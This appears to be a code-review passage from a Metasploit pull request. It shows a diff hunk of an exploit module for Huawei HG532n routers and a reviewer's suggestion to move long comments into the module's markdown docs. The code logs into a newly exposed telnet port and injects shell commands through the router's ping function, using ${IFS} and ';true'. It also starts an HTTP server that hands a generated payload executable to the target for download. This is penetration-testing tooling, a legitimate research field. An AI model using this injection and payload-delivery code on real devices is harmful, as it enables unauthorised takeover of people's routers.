modules/exploits/linux/http/huawei_hg532n_cmdinject.rb

```diff
@@ -0,0 +1,550 @@
+    end
+  end
+
+  #
+  # Basic telnet login. Due to mixins conflict, revert to using plain
+  # Rex sockets (thanks @hdm!)
+  #
+  def telnet_login(port)
+    print_status "Connecting to just-exposed telnet port #{port}"
+
+    @telnet_prompt = 'HG520b>'
+    @telnet_timeout = 60
+
+    @telnet_sock = Rex::Socket.create_tcp(
+      'PeerHost' => rhost,
+      'PeerPort' => port,
+      'Context'  => { 'Msf' => framework, 'MsfExploit' => self },
+      'Timeout'  => @telnet_timeout
+    )
+    if @telnet_sock.nil?
+      fail_with(Failure::Unreachable, "Exposed telnet port unreachable")
+    end
+    add_socket(@telnet_sock)
+
+    print_good "Connection succeeded. Passing telnet credentials"
+    telnet_auth_negotiation(@telnet_sock, @telnet_timeout)
+
+    print_good "Credentials passed; waiting for prompt '#{@telnet_prompt}'"
+    telnet_prompt_wait
+
+    print_good 'Prompt received. Telnet access fully granted!'
+  end
+
+  def telnet_exit
+    return if @telnet_sock.nil?
+    @telnet_sock.write('exit' + OPT_NAOFFD + OPT_BINARY)
+  end
+
+  #
+  # Router's limited ATP shell just reverts to classical Linux
+  # shell when executing a ping:
+  #
+  #       "ping %s > /var/res_ping"
+  #
+  # A succesful injection would thus substitute all its spaces to
+  # ${IFS}, and trails itself with ";true" so it can have its own
+  # IO redirection.
+  #
+  def execute_command(command, error_regex = nil, background: false)
+    print_status "Runninig command on target: #{command}"
+
+    command.gsub!(/\s/, '${IFS}')
+    separator = background ? '&' : ';'
+    atp_cmd = "ping ?;#{command}#{separator}true"
+
+    @telnet_sock.write(atp_cmd + OPT_NAOFFD + OPT_BINARY)
+    telnet_prompt_wait(error_regex)
+    print_good "Command executed succesfully"
+  end
+
+  #
+  # Our own HTTP server, for serving the payload
+  #
+  def start_http_server
+    @pl = generate_payload_exe
+
+    downfile = datastore['DOWNFILE'] || rand_text_alpha(8 + rand(8))
+    resource_uri = '/' + downfile
+
+    if datastore['DOWNHOST']
+      print_status "Will not start local web server, as DOWNHOST is already defined"
+    else
+      print_status("Starting web server; hostinig #{resource_uri}")
+      start_service(
+        'ServerHost' => '0.0.0.0',
+        'Uri' => {
+          'Proc' => proc { |cli, req| on_request_uri(cli, req) },
+          'Path' => resource_uri
+        }
+      )
+    end
+
+    resource_uri
+  end
+
+  #
+  # HTTP server incoming request callback
+  #
+  def on_request_uri(cli, _request)
+    print_good "HTTP server received request. Sending payload to victim"
+    send_response(cli, @pl)
+  end
+
+  #
+  # Unfortunately we could not use the `echo' command stager since
+  # the router's busybox echo does not understand the necessary
+  # "-en" options. It outputs them to the binary instead.
+  #
+  # We could not also use the `wget' command stager, as Huawei
```

Comment:
I would make a section in this module's markdown docs called notes (prob the 2nd section, after vulnerable app but before commands to use the module). That will shorten the module and make it easy to see. You could then change the in module comments to say something like " see notes in docs for additional details" so it's obvious there's info elsewhere to check.

Also up for suggestions or any other ideas.
Every comment shouldn't be converted to the markdown docs but some of the longer more explanatory ones would be better there.